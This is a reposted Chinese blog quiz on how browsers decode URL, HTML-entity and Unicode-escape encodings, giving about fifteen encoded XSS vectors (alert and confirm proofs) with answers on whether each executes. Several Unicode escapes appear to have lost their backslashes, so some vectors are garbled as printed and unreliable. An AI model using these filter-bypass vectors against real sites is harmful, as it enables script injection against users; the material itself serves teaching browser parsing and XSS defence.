zoukankan      html  css  js  c++  java
  • XSS的一些payload

    1. <a href="%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%31%29"></a>
    URL encoded "javascript:alert(1)"
    
    答:javascript不会执行。
    
    
    2. <a
    href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:%61
    %6c%65%72%74%28%32%29">
    Character entity encoded "javascript" and URL encoded "alert(2)"
    
    答:javascript将执行。
    
    
    3. <a href="javascript%3aalert(3)"></a>
    URL encoded ":"
    
    答:javascript不会执行。
    
    
    4. <div>&#60;img src=x onerror=alert(4)&#62;</div>
    Character entity encoded < and >
    
    答:javascript不会执行。
    
    
    5. <textarea>&#60;script&#62;alert(5)&#60;/script&#62;</textarea>
    Character entity encoded < and >
    
    答案: javascript不会执行, 字符实体不会被解码
    
    
    6. <textarea><script>alert(6)</script></textarea>
    
    答:javascript不会执行。
    
    
    Advanced
    7. <button onclick="confirm('7&#39;);">Button</button>
    Character entity encoded '
    
    答:javascript将执行。
    
    
    8. <button onclick="confirm('8u0027);">Button</button>
    Unicode escape sequence encoded '
    
    答:javascript不会执行。
    
    
    9. <script>&#97;&#108;&#101;&#114;&#116&#40;&#57;&#41;&#59</script>
    Character entity encoded alert(9);
    
    答:javascript不会执行。
    
    
    10. <script>u0061u006cu0065u0072u0074(10);</script>
    Unicode Escape sequence encoded alert
    
    答:javascript将执行。
    
    
    11. <script>u0061u006cu0065u0072u0074u0028u0031u0031u0029</script>
    Unicode Escape sequence encoded alert(11)
    
    答:javascript不会执行。
    
    
    12. <script>u0061u006cu0065u0072u0074(u0031u0032)</script>
    Unicode Escape sequence encoded alert and 12 
    
    答:javascript不会执行。
    
    
    13. <script>alert('13u0027)</script>
    Unicode escape sequence encoded '
    
    答:javascript不会执行。
    
    
    14. <script>alert('14u000a')</script>
    Unicode escape sequence encoded line feed.
    
    答:javascript将执行。
    
    
    Bonus
    16. <a
    	  href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x31;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x36;&#x33;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x35;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x32;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x34;&#x28;&#x31;&#x35;&#x29;"></a>
    
    答:javascript将执行。
    

    http://www.wjlshare.xyz/2019/08/10/深入理解浏览器解析机制和xss向量编码-文章总结/

  • 相关阅读:
    Oracle序列更新
    ssh服务器终端乱码
    iTerm2常用的快捷键
    原来 Set 集合也可以排序
    Java 单例
    java后台技术
    网易考拉规则引擎平台架构设计与实践
    HBase最佳实践(好文推荐)
    如何通俗的解释云
    写的不错的一篇云数据库的文章
  • 原文地址:https://www.cnblogs.com/lovesickness/p/13491020.html
Copyright © 2011-2022 走看看